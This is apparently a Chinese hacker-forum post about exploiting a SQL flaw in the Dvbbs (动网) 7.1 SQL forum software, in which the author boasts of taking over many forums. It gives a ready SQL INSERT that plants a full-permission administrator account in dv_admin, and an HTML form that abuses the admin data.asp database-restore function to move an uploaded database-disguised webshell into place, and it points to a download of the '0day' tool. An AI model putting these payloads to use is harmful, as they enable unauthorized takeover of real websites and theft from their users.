反正偶丢出来了。谁爱转就转去吧... 嘿嘿。
据说8月份这个漏洞就出来了 是针对动网7.1SQL版的。 漏洞文件dv_dpo.asp .. 原来只知道是有 但是没想到利用工具都出来了 我拿到的是时候刚好是八月末。

用这个小东西拿了不少动网论坛。 hackest 写文章了..既然他写了偶就给发出来吧。 现在好能拿好些呢 呵呵~~ 不过虽然能在前台将普通用户提升到

管理员 但是加后台的时候这个工具所给的代码是不能用的。 跟本不成功 后来小志给出的是

以下是引用片段： insert into dv_admin (username,[password],flag,adduser) values ('7da8373971','323b453885f5181f','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','7da8373971')

 用这个代码才可以加到后台管理员 否则是不能登陆后台的

SQL版拿WEBSHELL方法好象就两个 一个是导出一句话用动网利用工具提交 但是那样备份的目录有的是不可写的

还有一个就是

以下是引用片段： <form action="http://论坛地址/admin/data.asp?action=RestoreData&act=Restore"method=post><p>

已上传的文件位置

以下是引用片段： <input name=Dbpath type=text size=80></p><p>

复制到的位置

以下是引用片段： <input name=backpath type=text size=80></p><p><input type=submit value=提交></p></form>

利用data.asp的恢复数据库 用蓝鱼合并一个数据库马就好了... 这个方法网上好象有说明。 我测试成功过一次

工具下载： 动网0day